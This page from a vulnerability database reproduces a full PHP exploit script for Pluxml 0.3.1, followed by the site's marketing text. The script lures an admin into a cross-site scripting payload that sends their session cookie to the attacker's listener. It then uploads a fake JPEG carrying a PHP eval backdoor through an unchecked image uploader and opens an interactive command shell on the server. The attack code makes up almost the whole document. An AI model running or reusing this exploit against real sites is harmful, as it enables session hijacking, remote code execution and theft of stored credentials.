Vulners
Lucene search
Pluxml 0.3.1 Remote Code Execution Exploit
<?php
#
# This file require the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
# Note: The new version is compatible with PHP 4 by default.
##############################################################
error_reporting(E_ALL ^ E_NOTICE);
require('phpsploitclass.php');
# C:\> sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196
# [/]Waiting for connection on http://90.27.10.196:80/
# [!]Now you have to make the victim to click on the url
# [+]Received 395 bytes from 182.26.54.2:2007
# [+]Sending 366 bytes to 182.26.54.2:2007
# [+]Received 326 bytes from 182.26.54.2:2009
# [+]Sending 366 bytes to 182.26.54.2:2009
# [+]Received 692 bytes from 182.26.54.2:2010
# [!]Received one cookie from 182.26.54.2:2010
# [/]Verifying if there is a valid session id cookie
# [-]No: pollvote=1
# [!]Yes: PHPSESSID=c6255827c1a07c51a95af691a612484b
# [+]The created socket has been shut down
# $shell> whoami
# darkfig
#
if($argc < 5)
{
print("
------------ Pluxml 0.3.1 Remote Code Execution Exploit -------------
---------------------------------------------------------------------
Credits: DarkFig <[email protected]>
URL: acid-root.new.fr || mgsdl.free.fr
IRC: #[email protected]
Note: Coded for fun 8)
---------------------------------------------------------------------
Usage: $argv[0] -url <> -ip <> [Options]
Params: -url For example http://victim.com/pluxml0.3.1/
-ip The IP that will be bound to the socket
Options: -port The socket will listen on this port (default=80)
-proxy If you wanna use a proxy <proxyhost:proxyport>
-proxyauth Basic authentification <proxyuser:proxypwd>
---------------------------------------------------------------------
");exit(1);
}
# PhpSploit object
####################
$xpl = new phpsploit();
$xpl->agent('Firefox');
# Server
##########
$server_addr = getparam('ip',1);
$server_port = (getparam('port')!='') ? getparam('port') : '80';
$server_url = "http://$server_addr:$server_port/";
# Victim
##########
$hack = getparam('url',1);
$html = "<h1>hello :)</h1>\n";
# Apparently my XSS bypass NoScript protection
################################################
$xss = "<iframe src='${hack}pluxml/admin/auth.php?msg="
."<script>document.location=(".char($server_url.'?c=')
.".concat(document.cookie))</script>'"
." height=0 width=0>";
# Socket
##########
$handle = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_bind($handle, $server_addr, $server_port);
socket_listen($handle);
print "\n[/]Waiting for connection on $server_url";
print "\n[!]Now you have to make the victim to click on the url";
# Wait until we get admin rights
##################################
while(TRUE)
{
$packet = '';
if(!$msg = socket_accept($handle))
exit(1);
# End of the packet ?
######################
while(!ereg("\r\n\r\n",$packet))
$packet .= socket_read($msg, 2048, PHP_BINARY_READ);
socket_getpeername($msg, $clientaddr, $clientport);
print "\n[+]Received ".strlen($packet)." bytes from $clientaddr:$clientport";
# Server response
##################
$serv =
"HTTP 1.x 200 OK\r\n"
."Connection: close\r\n"
."Transfer-Encoding: chunked\r\n"
."Content-Type: text/html\r\n\r\n"
.$html.$xss."\r\n\r\n";
# Is there a cookie ?
#######################
if(preg_match("#\?c=(\S*) HTTP/1\.([01x]+)#", $packet, $cookies))
{
print "\n[!]Received one cookie from $clientaddr:$clientport";
print "\n[/]Verifying if there is a valid session id cookie";
$cookie = explode(';%20',$cookies[1]);
foreach($cookie as $session)
{
# Valid session id ?
#######################
if(is_valid_session($session))
# Let's upload a file
#######################
code_execution();
}
print "\n[-]No valid session id cookie found";
print "\n[/]Always waiting for connection";
}
# Answer to the client
########################
else
{
print "\n[+]Sending ".strlen($serv)." bytes to $clientaddr:$clientport";
socket_write($msg, $serv, strlen($serv));
}
socket_close($msg);
}
# Function which is like getopt()
###################################
function getparam($param,$opt='')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == '-'.$param)
return $argv[$value+1];
}
if($opt)
exit("-$param parameter required");
else
return;
}
# Bypass magic_quotes_gpc
###########################
function char($data)
{
$char = 'String.fromCharCode(';
for($i=0;$i<strlen($data);$i++)
{
$char .= ord($data[$i]);
if($i != (strlen($data)-1))
$char .= ',';
}
return $char.')';
}
# Admin session always available ?
###################################
function is_valid_session($session)
{
global $xpl,$hack;
$xpl->addheader('Cookie',$session);
$xpl->get($hack.'pluxml/admin/index.php');
if(eregi('Location: auth.php', $xpl->getheader()))
{
print "\n[-]No: $session";
return FALSE;
}
else
{
print "\n[!]Yes: $session";
return TRUE;
}
}
# File upload vulnerability
#############################
function code_execution()
{
global $xpl,$hack,$msg;
socket_close($msg);
print "\n[+]The created socket has been shut down";
# +images.php [File Upload Vulnerability]
# |
# 11. if(!empty($_FILES)){
# 12. $uploaddir = '../../images/';
# 13. $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
# 14. if(getimagesize($_FILES['userfile']['tmp_name'])){
# 15. move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile);
# 16. chmod($uploadfile, 0777);
# 17. $msg = 'Image envoy閑';
# 18. }else{
# 19. $msg = 'Le fichier n\'est pas une image';
# 20. }
# 21. header('Location: images.php?msg='.$msg);
# 22. }
#
# Fake JPG 1x1
# 000000A0 007F 3C3F 7068 700D 0A69 6628 6973 7365 ..<?php..if(isse
# 000000B0 7428 245F 5345 5256 4552 5B48 5454 505F t($_SERVER[HTTP_
# 000000C0 5348 454C 4C5D 2929 0D0A 7B0D 0A70 7269 SHELL]))..{..pri
# 000000D0 6E74 2031 3233 3435 3637 3839 3130 3131 nt 1234567891011
# 000000E0 3132 3B0D 0A65 7661 6C28 245F 5345 5256 12;..eval($_SERV
# 000000F0 4552 5B48 5454 505F 5348 454C 4C5D 293B ER[HTTP_SHELL]);
# 00000100 0D0A 7072 696E 7420 3132 3334 3536 3738 ..print 12345678
# 00000110 3931 3031 3131 323B 0D0A 7D0D 0A3F 3EFF 9101112;..}..?\>.
#
$fakejpg =
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x01\x01\x00"
."\x60\x00\x60\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06"
."\x05\x08\x07\x07\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B"
."\x0C\x19\x12\x13\x0F\x14\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20"
."\x24\x2E\x27\x20\x22\x2C\x23\x1C\x1C\x28\x37\x29\x2C\x30\x31"
."\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C\x2E\x33\x34\x32\xFF"
."\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D\x0D\x18\x32"
."\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
."\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
."\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
."\x32\x32\x32\x32\x32\x32\x32\x32\xFF\xFE\x00\x7F\x3C\x3F\x70"
."\x68\x70\x0D\x0A\x69\x66\x28\x69\x73\x73\x65\x74\x28\x24\x5F"
."\x53\x45\x52\x56\x45\x52\x5B\x48\x54\x54\x50\x5F\x53\x48\x45"
."\x4C\x4C\x5D\x29\x29\x0D\x0A\x7B\x0D\x0A\x70\x72\x69\x6E\x74"
."\x20\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31"
."\x32\x3B\x0D\x0A\x65\x76\x61\x6C\x28\x24\x5F\x53\x45\x52\x56"
."\x45\x52\x5B\x48\x54\x54\x50\x5F\x53\x48\x45\x4C\x4C\x5D\x29"
."\x3B\x0D\x0A\x70\x72\x69\x6E\x74\x20\x31\x32\x33\x34\x35\x36"
."\x37\x38\x39\x31\x30\x31\x31\x31\x32\x3B\x0D\x0A\x7D\x0D\x0A"
."\x3F\x3E\xFF\xC0\x00\x11\x08\x00\x01\x00\x01\x03\x01\x22\x00"
."\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01"
."\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02"
."\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00"
."\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D"
."\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31\x41\x06\x13\x51\x61"
."\x07\x22\x71\x14\x32\x81\x91\xA1\x08\x23\x42\xB1\xC1\x15\x52"
."\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17\x18\x19\x1A\x25"
."\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43\x44\x45"
."\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64"
."\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83"
."\x84\x85\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99"
."\x9A\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6"
."\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3"
."\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8"
."\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xC4\x00"
."\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00"
."\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B"
."\xFF\xC4\x00\xB5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05"
."\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31"
."\x06\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91"
."\xA1\xB1\xC1\x09\x23\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24"
."\x34\xE1\x25\xF1\x17\x18\x19\x1A\x26\x27\x28\x29\x2A\x35\x36"
."\x37\x38\x39\x3A\x43\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55"
."\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68\x69\x6A\x73\x74"
."\x75\x76\x77\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88\x89\x8A"
."\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7"
."\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4"
."\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA"
."\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7"
."\xF8\xF9\xFA\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00"
."\x3F\x00\xF7\xFA\x28\xA2\x80\x3F\xFF\xD9";
$formdata = array(
frmdt_url => $hack.'pluxml/admin/images.php',
'userfile' => array(
frmdt_filename => 'iwashere.php',
frmdt_content => $fakejpg));
$xpl->formdata($formdata);
print "\n\$shell> ";
while(!preg_match('#^(quit|exit)$#', ($cmd = trim(fgets(STDIN)))))
{
# $shell> cat ../pluxml/conf/password.xml
########################################
$xpl->addheader('Shell',"system('$cmd');");
$xpl->get($hack.'images/iwashere.php');
$content = explode('1.23456789101E+014',$xpl->getcontent());
print $content[1]."\n\$shell> ";
}
exit(0);
}
?>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Jul 2007 00:00Current
7.1High risk
Vulners AI Score7.1